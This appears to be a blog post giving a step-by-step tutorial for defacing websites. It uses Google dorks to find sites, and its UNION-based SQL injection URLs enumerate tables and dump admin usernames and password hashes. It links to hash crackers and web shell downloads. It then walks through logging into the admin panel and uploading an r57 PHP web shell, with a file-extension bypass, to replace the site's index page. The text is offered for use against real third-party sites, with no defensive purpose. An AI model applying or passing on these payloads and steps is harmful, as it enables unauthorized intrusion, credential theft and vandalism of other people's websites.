1.
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in
2. What is Defacement ?
A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the
What do you need before you start
*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*
Admin Finder:
http://www.mediafire.com/?0a4aw2gmeohndny
Vulnerable Scanner:
http://seanstar.000space.com/ &
http://newbie.000space.com/sql%20scanner/ or you can use Exploit Scanner.
Dorks for Finding Vulnerable sites!:
Common Dorks
inurl:members.
inurl:page.php?id=
inurl:login.php?id=
inurl:index.php?id=
inurl:register.php?id=
inurl:staff.php?id=
inurl:detail.php?id=
inurl:view.php?id=
MD5 Hash Crackers Online:
http://www.md5crack.com
http://www.md5decrypter.com
http://www.md5decrypter.co.uk
http://md5.rednoize.com
http://md5decryption.com
http://www.md5decrypter.com
http://passcracking.com
http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php
http://www.xmd5.org
http://www.md5cracker.com/index.php
http://md5.noisette.ch/index.php
http://md5cracker.org
Text to ASCII Converter:
http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;
http://getyourwebsitehere.com/jswb/text_to_ascii.html
Shell:
http://www.kinginfet.net/shells/
Some vulnerable websites
Starting Tutorial:
1. First you need to find vulnerable website.
http://sql-vuln-site.com/index.php?id=15
2. Now you need to find columns.
http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )
Error’s looks like this:
You have an error in your
database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39
3. Now Select columns
Columns is 5
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–
4. Finding version.
So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–
you got the version like this:
5.0.32-Debian_7etch11-log
5. Finding Tables
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–
And you will got tables like this:
PRODUCTS , ADMINS , and others
So must be there table by name: admin , users , user , login , client.
6. Finding Columns in the Table ADMINS.
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–
We found ADMINS table now go to ASCII web and convert ADMINS
You will got this ADMINS
Remove &# and replace ; to ,
Like this: 65,68,77,73,78,83
You put table_name=char(65,68,77,73,78,83)–
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–
And you will got the columns in table ADMINS
There need to have columns with names: username and password
7. Getting username and password.
Now we put concat(username,0x3a,password) and admins
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–
( 0x3a is ASCII )
8. Finded username and password
So you found the username and password
if the password is hash like this: 2510c39011c5be704182423e3a695e91
you will need to use MD5 Hash Online Crackers.
If password is not hash you are lucky and now you need to find admin panel.
9. Finding Admin Panel
Open the tool Admin Finder
Put the website in the bellow and click Scan.
So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php
You open website and there have Username: Password:
Put username and password what you got.
Done you login in Admin Panel lets
10. Uploading Shell and Add Deface
In Admin Panel you will search categories or anything where you can upload a file or picture.
When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:
http://sql-vuln-site.com/upload/r57.php
If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!
You need to make a deface page in html and put in the website
So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.
Congratulations you deface the website.
Post a Comment